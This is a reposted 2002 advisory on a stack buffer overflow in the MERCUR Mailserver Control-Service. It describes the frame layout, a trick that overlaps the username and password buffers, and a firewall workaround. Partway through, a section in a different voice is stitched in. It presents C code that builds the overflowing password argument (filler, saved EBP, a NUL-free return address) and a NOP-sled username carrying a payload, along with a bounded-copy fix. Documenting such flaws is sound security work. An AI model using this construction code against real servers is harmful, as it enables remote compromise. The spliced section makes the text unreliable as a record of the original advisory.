SECURITYVULNS:DOC:3233

MERCUR Mailserver advisory/remote exploit

2002-07-19 00:00:00
vulners.com

2c79cbe14ac7d0b8472d3f129fa1df55 Security Advisory #3

#PRODUCT

Atrium Software International's
MERCUR Mailserver, All Versions

#DESCRIPTION

MERCUR Mailserver's Control-Service, installed and
activated by default on port 32000, is vulnerable to
a classic stack buffer overflow in its password
argument. An exploit for MERCUR 4.2 (current) is
included and has been tested against both Windows 2000
and Windows XP Pro.

The stack frame looks like this:

<260 bytes><EBP><EIP>

as you can see, I'm too lazy to write my own shellcode
to fit in that wee little 260-byte buffer… and we
can't put it on the far side of the return address
either: anything more than a few bytes past EIP ends
up overwriting what will become the contents of ECX
before our target RET executes, causing an exception
before our code ever runs… so a sexy little trick is
in order…

we just abuse the fact that an invalid username, one
of a very large length, is also copied into local
memory and is still resident there when we overrun the
password buffer… sizing these two arguments correctly,
we can make the two copies overlap, so a short jump
from the password buffer lands in our payload (the
username buffer) easily… YIPPPEE!@!#

The two arguments therefore carry different things:
the password argument is 260 bytes of filler, then the
saved EBP and the return address (which must not
contain 0x00, or the copy stops early); the username
argument is the real payload, padded to a size large
enough to overlap the password buffer.
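The following is an added example, not the exploit the advisory says it includes (that code is not on this page). It models the `<260 bytes><EBP><EIP>` layout above on a 32-bit little-endian frame, shows which saved slot an unbounded copy reaches for a given argument length, builds the two argument strings the overlap trick needs, and gives the bounded copy that would close the bug. Assumptions not taken from the advisory: the saved EBP sits directly after the 260-byte buffer with the return address after it, the copy has strcpy semantics (stops at the first NUL), the addresses and the `0xcc` payload bytes are placeholders, and there is no network code because the Control-Service's command syntax is not described on the page.

```c
/*
 * Added example, not the advisory's exploit.  Models the
 * <260 bytes><EBP><EIP> layout on an assumed 32-bit little-endian
 * frame; addresses and payload bytes below are placeholders.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PW_BUF_LEN    260               /* local password buffer per the advisory */
#define SAVED_EBP_OFF PW_BUF_LEN        /* 260: assumed saved EBP slot */
#define RET_OFF       (PW_BUF_LEN + 4)  /* 264: assumed return address slot */
#define RET_END       (RET_OFF + 4)     /* 268: first byte past EIP */

enum slot { HIT_NONE = 0, HIT_SAVED_EBP = 1, HIT_RET_ADDR = 2 };

/* Which saved slot an unbounded strcpy of an arglen-byte password
   reaches (strcpy writes arglen+1 bytes, including the terminator). */
enum slot slot_hit(size_t arglen)
{
    size_t written = arglen + 1;
    if (written <= SAVED_EBP_OFF) return HIT_NONE;
    if (written <= RET_OFF)       return HIT_SAVED_EBP;
    return HIT_RET_ADDR;
}

/* All four return-address bytes are attacker-chosen only once the
   terminator lands at or past offset 268. */
int controls_return_address(size_t arglen)
{
    return arglen >= RET_END;
}

/* Password argument: 260 bytes of filler, then saved EBP, then the
   return address, both little-endian.  Returns the length written, or
   -1 if either value contains 0x00 (the copy would stop there) or the
   output buffer is too small. */
int build_password(uint8_t *out, size_t outsz, uint32_t saved_ebp, uint32_t ret)
{
    uint32_t words[2] = { saved_ebp, ret };
    if (outsz < RET_END + 1) return -1;
    memset(out, 'A', PW_BUF_LEN);
    for (int w = 0; w < 2; w++)
        for (int b = 0; b < 4; b++) {
            uint8_t byte = (uint8_t)(words[w] >> (8 * b));
            if (byte == 0) return -1;
            out[PW_BUF_LEN + 4 * w + b] = byte;
        }
    out[RET_END] = 0;
    return RET_END;
}

/* Oversized username that stays resident next to the password buffer:
   a NOP sled with the payload at its end, so any landing point inside
   the sled slides into the payload.  Payload bytes must be NUL-free. */
int build_username(uint8_t *out, size_t outsz, size_t total,
                   const uint8_t *payload, size_t payload_len)
{
    if (total < payload_len || outsz < total + 1) return -1;
    for (size_t i = 0; i < payload_len; i++)
        if (payload[i] == 0) return -1;
    memset(out, 0x90, total - payload_len);
    memcpy(out + total - payload_len, payload, payload_len);
    out[total] = 0;
    return (int)total;
}

/* The fix the service needs: refuse a password that does not fit in
   the buffer instead of copying it unbounded.  Returns 0 on success,
   -1 if no terminator is found within dstsz bytes. */
int copy_password_bounded(const char *arg, char *dst, size_t dstsz)
{
    const char *end = memchr(arg, 0, dstsz);
    if (end == NULL) return -1;        /* too long: reject, do not truncate */
    size_t n = (size_t)(end - arg);
    memcpy(dst, arg, n);
    dst[n] = 0;
    return 0;
}

int main(void)
{
    uint8_t pw[512], user[1024];
    const uint8_t placeholder[] = { 0xcc, 0xcc, 0xcc, 0xcc }; /* int3s, stand-in for shellcode */
    int n = build_password(pw, sizeof pw, 0x41414141u, 0x7c7c7c7cu); /* placeholder addresses */
    int m = build_username(user, sizeof user, 800, placeholder, sizeof placeholder);
    printf("password arg: %d bytes, return address at offset %d\n", n, RET_OFF);
    printf("username arg: %d bytes, payload at offset %d\n", m, m - (int)sizeof placeholder);
    return 0;
}
```

`slot_hit` and `controls_return_address` are the sizing check: a 264-byte password already touches EIP with its terminator, but only from 268 bytes up are all four bytes yours. `build_password` rejects any address with a zero byte for the same reason. How far the username copy lies from the password buffer is not stated in the advisory, so the sled length (800 here) is a free parameter you would tune against the real frame.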

#FIX/PATCH/WORKAROUND

no patch this time, as the workaround is simple… MERCUR
allows you to restrict access to each service
individually under the Security -> Firewall options,
so limit the Control-Service on port 32000 to the
hosts that actually need to administer the server…
32000 should be restricted by default, and I would
guess it soon may be…

sorry about the Winamp patch; who the hell knew WinRAR
uses a proprietary zip format…

symantec's #1 fan,
2c79cbe14ac7d0b8472d3f129fa1df55
